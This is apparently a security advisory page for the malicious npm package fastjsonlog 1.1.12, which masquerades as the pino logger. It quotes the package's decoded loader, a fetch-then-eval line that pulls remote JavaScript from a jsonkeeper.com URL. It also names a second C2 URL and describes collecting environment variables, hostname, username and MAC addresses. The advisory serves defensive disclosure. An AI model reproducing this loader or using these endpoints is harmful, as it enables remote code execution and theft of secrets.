VDB
GCVE-110-OSM-2026-1404
GCVE-110-OSM-2026-1404
Advisory PublishedCVSS 9.6/10
Executes a remote second-stage payload fetched from attacker-controlled domain jsonkeeper.com (https://jsonkeeper.com/b/0DWFC) via eval(atob(hash)) in lib/writer.js, with full process.env, hostname, username, and MAC addresses collected into a data object in closure scope for the eval. A secondary C2 endpoint (https://www.jsonkeeper.com/b/HY6M6) is constructed via hex-obfuscation and called via axios.get. Masquerades as the pino logger.
lib/writer.js defines data = { ...process.env, platform, hostname, username, macAddresses } at module scope. eval(atob(hash)) decodes to fetch('https://jsonkeeper.com/b/0DWFC').then(r=>r.json()).then(d=>{eval(d.ret);}); executing attacker-controlled JS with the data object in closure scope. A second C2 (https://www.jsonkeeper.com/b/HY6M6) is referenced via hex-encoded hl array using the same axios.get chain.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | fastjsonlog | 1.1.12 (affected) | — |
Browse GCVE Records
72,409 records in the GCVE database · Updated July 14, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.